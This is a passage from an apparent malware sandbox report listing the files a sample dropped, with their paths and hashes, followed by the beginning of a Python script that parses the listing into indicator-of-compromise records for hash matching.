| SHA512 | 67215a7f64bc5d6fe617c0eca79944fa156b54af5329a1e0e3c36db94ee45d9539ad9918440919cc86021a0d4b24d612bf5732bc207f187a5a8c9b436dec3401 |
C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe
| MD5 | 28e568616a7b792cac1726deb77d9039 |
| SHA1 | 39890a418fb391b823ed5084533e2e24dff021e1 |
| SHA256 | 9597798f7789adc29fbe97707b1bd8ca913c4d5861b0ad4fdd6b913af7c7a8e2 |
| SHA512 | 85048799e6d2756f1d6af77f34e6a1f454c48f2f43042927845931b7ecff2e5de45f864627a3d4aa061252401225bbb6c2caa8532320ccbe401e97c9c79ac8e5 |
C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe
| MD5 | dfd5f78a711fa92337010ecc028470b4 |
| SHA1 | 1a389091178f2be8ce486cd860de16263f8e902e |
| SHA256 | da96f2eb74e60de791961ef3800c36a5e12202fe97ae5d2fcfc1fe404bc13c0d |
| SHA512 | a3673074919039a2dc854b0f91d1e1a69724056594e33559741f53594e0f6e61e3d99ec664d541b17f09ffdebc2de1b042eec19ca8477fac86359c703f8c9656 |
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
| MD5 | 8e0d340e723ce188de651b8ffb887d81 |
| SHA1 | cb90a07f1a4ffae68cca6281325606009d3d7266 |
| SHA256 | 514c0d56b0b5ea74a2729c99adcc92cd4b51795498281c1675636bb5b9d17cb7 |
| SHA512 | d5505ef82f69085b975312255bb733f66a97850ecb6608000ba642ec7d2997a88a184d230c38acfe01a9d33adf0b46b88a59d4b97bf11ae9a45b7b9c7e2904e1 |
C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe
| MD5 | d9694a6a1989d79aeded3f93cb97d24e |
| SHA1 | a18019b9793029dac4d10e619ec85ea26909336a |
| SHA256 | 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c |
| SHA512 | 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168 |
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
| MD5 | e364a1bd0e0be70100779ff5389a78da |
| SHA1 | dd8269db6032720dbac028931e28a6588fca7bae |
| SHA256 | 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e |
| SHA512 | ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338 |
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
| MD5 | 2d0600fe2b1b3bdc45d833ca32a37fdb |
| SHA1 | e9a7411bfef54050de3b485833556f84cabd6e41 |
| SHA256 | effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696 |
| SHA512 | 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703 |
C:\Users\Admin\AppData\Local\Temp\main\KillDuplicate.cmd
| MD5 | 68cecdf24aa2fd011ece466f00ef8450 |
| SHA1 | 2f859046187e0d5286d0566fac590b1836f6e1b7 |
| SHA256 | 64929489dc8a0d66ea95113d4e676368edb576ea85d23564d53346b21c202770 |
| SHA512 | 471305140cf67abaec6927058853ef43c97bdca763398263fb7932550d72d69b2a9668b286df80b6b28e9dd1cba1c44aaa436931f42cc57766eff280fdb5477c |
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
| MD5 | ff7e78da9c8e580229fe95dfdfe5b098 |
| SHA1 | ab968e47e463f29426116753b0ca086fd5b33cdb |
| SHA256 | cefa40083339d42320bc1f9ba33c578b8abe47e15eb0dd6b0ba2f734aa8f3d6d |
| SHA512 | 45517b8bc96613daeabb738a42188b8ef19b0ac2b53e3202f7d86f683dacdbe1c4a78414938ab5ad0b48b7c546bc89a78932e3b8a1dbf6604e59b4887de48409 |
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
| MD5 | d6b16370cd4e60185aa88607316a0c05 |
| SHA1 | 7fbc63b1203617c67e5491745beaedb424baed78 |
| SHA256 | a6d6d1c8299f97f966d72373e999b5a8e6768914e27d5533307cf6878b95dce2 |
| SHA512 | 16c468948e568343ab1a1460d82b4c5859d09043e3a0115aa9c0aefeabfa22c796cca505ede8b1f194764dda7c5263979230e3fa272ee1fb3b21919202b01906 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\UpdateCheckpoint.xlsx
| MD5 | 056696cc180ecd5f15b714fc6d5eae1c |
| SHA1 | c363b0460c910922c898d8dabda2e3fe7739d6c8 |
| SHA256 | 68186f1384ba0a1651f691d59945eef2f75cbca5238e37345cdee62db53eeacd |
| SHA512 | d5c64d2d491de3805a7b9a257a8176a274cf3c3017152f001e6f67ff2015afdc63514cf476f36a7ca0beaf95af7181713c1777f39bc0f14ed288f98e45d1c342 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\RegisterClose.docx
| MD5 | d9795e7b1d0b8c376343405d64aeb266 |
| SHA1 | 0b3ee9bfff52ee9154c521058c61b32e928beb34 |
| SHA256 | 558ecfb518fa64050861f2e0325478550d56784f2dc468788831c04c7639f63b |
| SHA512 | 9740a5f10178dd54409f554f36cafc98a9e4ba8cc3f62b72330b82b6805322d3d108d877c3f5588670766c2ff39fa170eb8e5478b13b7c89aa4ddecfdec89806 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ReadRename.xlsx
| MD5 | cdd6c3556bbce2063b27d601a2310683 |
| SHA1 | ecad969a3a84e390fa9de2623a0b7f0564c69767 |
| SHA256 | f249db2a16b392d1a0ea14abad834b738732520a5947610da61feed592e981c7 |
| SHA512 | 5468dbce130394d10331bc149bf7b8e2be846e4c24c0bcb261e4d94d075c7a2aefabe7d75b293492cffb92a4f734194e8f00a1d1751d7f23b92be10b7ae4d9d6 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\PopPublish.xlsx
| MD5 | 8e7e23f45f0a131c77d67e2ad532b80a |
| SHA1 | 2ec179d912556375dd42e1715ff91262c57e0557 |
| SHA256 | a4fba7e423ae2453da9b4162df9125f0a0211c6350a52e76bdaac479829d117a |
| SHA512 | e65a48c9c9f063360c2d8b039abdbd12fd1fedabe501ed80643b952c0409727bac34fa08da32ecff0ed4921d6d7f858f1a650be29bc86061cf427283475aaad2 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\OptimizeUninstall.xlsx
| MD5 | e15b6277dd5f5e45619be1552cd39c61 |
| SHA1 | 1ce9aee950936f1083f4f918a52ed2965f7334b4 |
| SHA256 | 15de0d3a0dfd9ee96285bd65685a3d4338b38c6d2d98bdc15e19be937908f216 |
| SHA512 | c39da02817b5b39776e680a04bc13f5934d35cbbc1c9410092493653d60fcd8efdaf2b2712cb7ca44aca3adbe3b5e43acdc89d18e4cb1e200be13f21b97a2e33 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\EnterConvertTo.docx
| MD5 | 5f191b928a693460bc0de69862c59b40 |
| SHA1 | 6b01c5f1108d6dd5128d6138cd00a3ddfc632275 |
| SHA256 | a45b5015537e1fc47977fd8aa70f30d3719369b166c3d851e6967b6e2213712f |
| SHA512 | f12826c3dc9ed85fc68d52ae818d3666d4805fcebf04a3e9ed30c53729681333a6773c9dcff0497a6ea0d73132485cdb7d80edbf2d57919f933c0f7ff01b0000 |
C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe
| MD5 | 12d7ae10b1836cd3091d712723a5a4d6 |
| SHA1 | b99fef462f433da1b959c69dfe62703d12464ea7 |
| SHA256 | 8c56614bca1aaaabe522c46bb14ad9237a9d80783725b729feb4b255c8aca445 |
| SHA512 | ab3dd7772ff74a3b48033be5011edc065425e225c5c1c489cd28c6791bd24fc14be01105b97e14dee6ed4b5f453a986048d1a91808619dad518c43065ebc699a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\sessionCheckpoints.json
| MD5 | ea8b62857dfdbd3d0be7d7e4a954ec9a |
| SHA1 | b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a |
| SHA256 | 792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da |
| SHA512 | 076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\prefs-1.js
| MD5 | 01f509d6012a7e7c3e0fc5d9dad5eded |
| SHA1 | c2ce15a086bbb763b1d2d91283d917e413933e90 |
| SHA256 | f14dcd79bb4e32d14c1c8916856707969b32d39b08c7c06f56469816ffbbebc3 |
| SHA512 | fafcab67b876a98e3d5e59d7c001917ed2e733f8d366d2ad70146d72483c42144889a576c1b008b8a8fc5dfa2a49e4d5071804cd31383996d373248645be2174 |
C:\Users\Admin\AppData\Local\Temp\arKMchRhiX.tmp
| MD5 | f310cf1ff562ae14449e0167a3e1fe46 |
| SHA1 | 85c58afa9049467031c6c2b17f5c12ca73bb2788 |
| SHA256 | e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855 |
| SHA512 | 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\789e06b4-5fcc-4626-998e-2ad008227881
| MD5 | 875a991523988094499b3522df4d2a49 |
| SHA1 | 41b4dadf123eb56010d3da60606b24c781210b92 |
| SHA256 | e6eb26f3219041383c85728a0665a12cbaf866c9c3225e2f76a4fbc10a3a1ed2 |
| SHA512 | 5aadb2912de935c95853a418e96f0f565c84c1737a8b60a1e4cf556fd7d9a994b279824def68579dbb745e4bc2f28477efd984e4f7ce7f7c405a34e8d5a5f6f4 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 6d30a6f08d65bbdf7fd9efd43959d239 |
| SHA1 | 51489c962c604eb54b97c3e17ffba6a894773928 |
| SHA256 | 46cb639a0078665e3f2c97a66db5aa547a606173ef2ba1785db722edf6d5f429 |
| SHA512 | 889e00b4b64b4d4e2d94808dbc818afd5a805bac7a112795c1c670338b218b7a82b172deb8fd07d6cb911c54a0edf8202cc9711ffc8c96baade1d6bffc58678a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\624ec02a-68a6-4ea0-9342-b7b3dbc1cdb7
| MD5 | 99b6d3ad8cbd6f52b5bf0b8917070ea7 |
| SHA1 | 0d42c43f9606f76936aeda9993b50c9c116b4045 |
| SHA256 | 2963f40ce92b376d1c0af1bf5e0701ca55783b236bbc6bd0a570891fdf0841ee |
| SHA512 | 12356f80662d9f738755b2aecc6015db35012bbb7602eb155edbb7f8fad84741d219200a2fb46b82419b4d1bc695d0977097bc0c625d60939819794a060aa3bf |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\activity-stream.discovery_stream.json
| MD5 | 0f3f3ccefd502c1fc2084f5d7e945254 |
| SHA1 | cfeaaa63a08fef3fa2ea530f85e7506afa0c503c |
| SHA256 | c995f4440eedc1765eb5aed73c76182c8e06cb97ecb7f929996a4cc583cbf5ad |
| SHA512 | ad05416c8d29357a0121069b8b5259505c267567ae43a258000ec9425e6b61e6012c1022789fa09f650f5b12d4132ff05f10bbbc3c3e57dadaba15e9d6726859 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\AlternateServices.bin
| MD5 | 6074595fdaa1998a9235ef39d2c8c55b |
| SHA1 | 8858968a0ba43781f9b4cec3ac98d07c78761a11 |
| SHA256 | c9fe2913e663f1982e5c6523eb621b7a0ca573be531b9f0a739129e82a36c606 |
| SHA512 | db1db9e2f642c6ad44917ceb88462b891bf62e02c850c74a81d8686409cd1cdff0a67f334bf550c7ad60b3aabddc5637430599f6e9dfcc720c72d39cc0285ce8 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | e44ad3ec814b01cf9f5e5adfbc2afbb5 |
| SHA1 | 13ac38cc796fc0c7d7779b53b6890a7e888445fd |
| SHA256 | a47215de125c6ea0e6cf770a38aec69086494de91473e432b01a517c98bf7129 |
| SHA512 | 8fd6fb21e90e0001a786ccc68260e59027308c7a5225dd653d64d62388899bd804ab746305b956154df865a08ecb6e7792ee655cd80ef8f8fc0387e08af8c11d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\pending_pings\8e447fcd-5e40-4eff-ac71-f83d73ac4eaa
| MD5 | 837d1097107a602edd6f2a1d7f92b508 |
| SHA1 | da1be10dfb2e548857ee99aee1d1d176e0a96d50 |
| SHA256 | e3d4ccfcabceb615566cd8b3af7b7c16a0741457e1afe0d349d3a1a7ec7dbdcb |
| SHA512 | 8180e8e2dd35ccd600521c509928b6e439a90546884b0c30c4aa7e2dd2a257d58499c984403ebfea1830501154e6e2c0945b3ba8eb15ba1642951a4e856f5395 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | b6070ed45472be0f2a824ebfb12591b2 |
| SHA1 | 42c6243c30989fe71749758366a90af8a8837a55 |
| SHA256 | 30154343a2a05fb51624a4bd82f4a65e464416bf53517599d15ab69fecd515e5 |
| SHA512 | 7f89f911b0f9b0c5101898dc841fa5b64a616e1b83e02ab2ff23b54464fb31557452149c93759edcbe605ff0d1c5d9edd1bf20bf8acd20740da8f2248954bc25 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 529ee0b111814b484736e7e2b57b6ce4 |
| SHA1 | d3ef5a87acbcb1509b280be177021c11e8953efd |
| SHA256 | 57ca1276297f2c84c478aff182b04c3e9acc81b24cd27cb323d8a0d47b191e79 |
| SHA512 | f5da7fdfc5f9e5ded6ebafb0f5e42ecaf0e2e4dbe2283a3590d9527b00246f90b72ef136bee3f7ef6e084dc854aaa87fd8716a7b8fae0d7893a18d2f784c26bd |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | a70ed4f8fb88b31c94743c342e7e3e5f |
| SHA1 | cfe16a8ea794d285384ce00e9ad85e394f3c7864 |
| SHA256 | 9bf2daba3032b75d66b70b7475c7fa8d09443ce8f39819ce081ca7e6f7e5db59 |
| SHA512 | 51908d753b2f4798863e268fdfa951f59d428b8bb1e4975fb3d56c60cef48c730ea6482507a593ad538a6b01b0be58022c8f48e9f8f302ad3b18a92933f5c6cc |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\AlternateServices.bin
| MD5 | 4de41b6b8df1aee35b693233baa3eaa4 |
| SHA1 | 6629007898e775011c1e1c88da1cff5d1a81c24a |
| SHA256 | cc98f5207b4ec245ecf7305a23eea3b8d9f706fef461c272ec2e9df8e97fac96 |
| SHA512 | 9f801441ea8b91f0c918c204453cc549f85638e467e0d4ab4d86b5f083ab68066dbb1722c4a3fc1393eb809131cc1d5a1d5f0942ed50bda30f6d00c9824fcc3c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\prefs.js
| MD5 | 49e0d1cd2f860d3be1fba7263ba59907 |
| SHA1 | a68e26318993c94791373542d9b496069eca9c89 |
| SHA256 | 7ce7aded2df7d5428d28c4c5b0210678fe6ff36d3cc685c51d41eccf10ce7c03 |
| SHA512 | 483e9620ccc444289ea7911eef035e94c4b08f3fb9ee2ab9b28ee980fdd9d64467077fd107b353ac8f5b0727f97b73e3085def6f35a4e46dc522f4d97dd40aed |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\prefs-1.js
| MD5 | 678decbd46ed14a903625e6528f85231 |
| SHA1 | a6536a74871a02b7c7e27cab9a40156729629dfa |
| SHA256 | 9643c2a87489c03c77a10ce91ff2006be2e5a31a88ef563843af36879cd7c644 |
| SHA512 | dcf941c20c6efd738b382e57d61aba1fa453b6f4284437c64516a982c43be3f787251b696f63fa7b286795fb1e7dc213de817fbeab04da9033b9b583954e6239 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\startupCache\webext.sc.lz4
| MD5 | 4670fc058803eeb6eb7ea559229597a2 |
| SHA1 | 97e1ba261d6d0017a78d893b15f1e631e400fcbe |
| SHA256 | e7094b58f2830217d217fb58ff12e2cc2ccf837956d29c1cb56f3eb3d95496ef |
| SHA512 | e60e7171da69e4487f905b7dc670a62709245d2bbd7dc0ff135a816b898798a7c8e397426c3ce90ec858d0f3261b136ef935a4cfc9df7c353a093295ad851944 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 17ac1a4ec6f95f17715a36c4c23742fe |
| SHA1 | 16bd7ba23ac5f4c78f300c681740c0254d012dea |
| SHA256 | 39400eb603971f09a05f94290afb7c6b873d2cf8299152c635257bdc1c3b8f84 |
| SHA512 | 2d9e3589cfb46d29e1432e72d5282d3ee4e7407cab07e744439d002a325192caab4e0894642bc5708b4c74c00633a5dca1e960521fa32b6dfc7b2e879bd2447f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 80a89ed30ea8cc953f16f347765ed807 |
| SHA1 | b462cb5a6cae6370909fcfade394bef3b90413e0 |
| SHA256 | 443110c287f4181537837bbe898ce04eda11eb44e217dab27e2a371108bec7e7 |
| SHA512 | 06f7a8b38ab8feb60ed0dee68034fc1c2f8f0f88a493e02c48bba17d2012ef8a6caaac1298c3048995c8c70dd634a1cfd45436dc763a074148876b9c34c1420c |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\42vejdix.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984
| MD5 | 75606e28ea71fc87c3e1fcde52eeae70 |
| SHA1 | 239be96529ad890f8c3e5873b870a4bcf4ebd1b4 |
| SHA256 | d07f4cc9df3d8a70619091e3e72a9654750d44b3ec1f2444c55f87287d125c3f |
| SHA512 | 9e1d3b4aa0684d38bad6992166d5e37f4170db95d86077dc16c516951ed460c5233fef975f612ab37f61b7678c1b5afb4309a52cf643a5d08f48e8a62012c0d7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\AlternateServices.bin
| MD5 | 064f9ddf1b4185b1d27990221885e18c |
| SHA1 | 406e898633ba5bbfb2e11b63e32631d575f89dc0 |
| SHA256 | a66b12f0c6d87f0c787b9d4140fac4347da8af369d75e4e3bb115f753b1b8905 |
| SHA512 | 027bb3de99ed4da30c84226d95021244888083a9cda88541e05b05c1a1aace1928c5e16e4e6f5f4f31f06bba405c5dc4f48ddd208a76e9f83d980d12c46991cf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\prefs-1.js
| MD5 | 5d9ed76dcb9c3bf3c4a8d07068454c89 |
| SHA1 | 01a4c3c6e4dce17c52836f62f5b912da7283496c |
| SHA256 | f6ee725281ab35c0230068677a2dc011e42bc2fbc666b01a8809459e6b8ab728 |
| SHA512 | e4ff82fbaeebbe7d78e2a75047e80b510418b748664f4bf302efdba4873b72bef053a356f8362824daafc410d441d188f4c06a9bf6380ee119a828912eeb4154 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 56265e0033a11f9854a2ada8573711db |
| SHA1 | 8e07b2f0cd2bb95c9480439531df35064f5f9c44 |
| SHA256 | a80c3474e26675a89b1760215cd4a2998ded378490e4c1c19a2a9fada45fc46a |
| SHA512 | 369f66e05e4432baf525b23046752cfd2bd0e060f94690c8f394da601b9a751a192644dcb219545800f39071c080dc064044f5f1972e25303be04780262fe7f4 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 5a5a62fed7b6e6b61fb3d2d0789119a8 |
| SHA1 | abfcbfe561694e9ab14482152d01d7fd57b86617 |
| SHA256 | 9263375e83d2149ef51c2a8e18cda9f9ff3be3911b3e70e04996b8a360457136 |
| SHA512 | ffe4543d2624d9d8fd1fb4d8fa8d97403b6997cd05e059eb5534b102f3a780d64c4222a9d1006cb7039e6978555a9d37f8251df8cbc4ceacab25e1d1d5fb13d9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | c53c6aaad93d5010873241a9ce2b3601 |
| SHA1 | ba224155df081e8e56a7a8eddf8d0230c6e14f9c |
| SHA256 | eda79a8c02cffc5c246f2ebb6e4a56d0a2b0b82fed0eea6ec8098ff35e35e96e |
| SHA512 | 48f2aeed981dee741379956b6cef62cdaa242d19abdebfbae311676f051f1b3af71f9a662872b503b37d6ea589db4938101a105a0e2da900dcd19a7deed4cd1a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | c5d213902dec25fd71f85fe8a4cd34e4 |
| SHA1 | dbe677a441013540d35b48996ffd078e018b124b |
| SHA256 | b886f71ba06dd79ffcb4c7a91da86b2f416a42961e239b73897f505a72dc9f08 |
| SHA512 | c203939c567195bf708382855e2f348def4596f3b2b62eb132f5c7216ad54b93ef5a531e150cf8953277fa9d39d57ae9d50e73b079c6300a685ab343d7fdfe63 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 7a542c006bd4f0110a6780127b7f1646 |
| SHA1 | 5e61f848a99bdf58325a1142f6788c018ef1f78a |
| SHA256 | b42ca7d8f9817ca226a89a204ae5b4f13ef82427bc8ac2f78c4e8f458bfe630f |
| SHA512 | fda2dc33b1feb3044af8e2ad2f380dfe382a1c1163290dcc9082a80f9d2c114a5257b93bc5db83bc91318ffdd63f0c140dfbee89662521ac110b6ca2be0587f3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\42vejdix.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | d13ddc8b82203939aa6fcc194bfacecb |
| SHA1 | b70ad7751dcb7291e0eef392f5edaf1d7927132d |
| SHA256 | 7cebffc0167db9fa87b32cb15bc40a93bc76478809c2bfab518337fc49d6053d |
| SHA512 | 9c58c3aa9db6809b01d61f342d8e0db904e575aa44f33e4c9183a44b742eacf090bec904fbc2b4b0d721779c2283f0ac611bb0fb55bfd81b403391092279e377 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | eb703e06c175f36ac87747c7f607f46a |
| SHA1 | f92d667cc50097b2da43b4370ceea7d3cb4bd8ee |
| SHA256 | 53a5574008d3f84d6408628f97c92afd90c9d0bd1c3047b7916562536714e04c |
| SHA512 | 170b4591c024771aa9ad8ed26671754f8c393f6072840552472162bc096b4ed4f19e0276c6dc741e1611bb863d2a787135fb51a27a97eb7cbcb3674d4b269e9b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_600_POS4.jpg
| MD5 | 655d9f0cf81ffe21abba5cf876043e25 |
| SHA1 | 6b2d8c5f9a422a97330a46de3189a2aff082525a |
| SHA256 | 1e101a054ba3cf6edabc59936ef9a395ee11453d0403af5c46db5e726cdaaf43 |
| SHA512 | f402acada9bfecc60f957212cb83e289e59cb2b854196cc5427093703bf9a869d84895c9f98f8e3700764e92c74b661ba6d0a43e6f6111e00d5ff25873791384 |
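The dropped-file listing above is a flat sequence: a path line, then four hash rows, with no per-table header. Two properties matter when turning it into an IOC set. The same path can recur with different digests (the Firefox `data.safe.tmp` and `prefs-1.js` entries appear several times because the sandbox saw the file rewritten), so records cannot be keyed by path alone, and a record can be split across a page boundary (the first two rows of this section belong to a path listed earlier). The parser below, an added example that is not part of the sandbox report, reads that layout, validates each digest's length, keeps every version of a path, and matches a sample's hashes against the result. The two entries embedded in it are copied from the listing above; the bytes hashed at the end are constructed stand-ins for a file collected from a suspect host.

```python
"""Parse a sandbox report's 'dropped files' listing into IOC records and match
a sample's digests against it. Example code, not part of the report."""
import hashlib
import re
from dataclasses import dataclass, field

# Hex-digit length of each digest the report prints.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Hash rows look like: | SHA256 | 7c8798ab... |
ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)

    def is_complete(self) -> bool:
        """True when all four digests are present with the expected length."""
        return all(len(self.hashes.get(alg, "")) == n for alg, n in HASH_LEN.items())


def parse_listing(text: str) -> list:
    """Turn 'path line followed by hash rows' blocks into DroppedFile records.

    Any non-empty line that is not a table row starts a new record; each hash
    row attaches to the most recent one. Records are kept in order, not keyed
    by path, because the same path may be listed several times. Rows that
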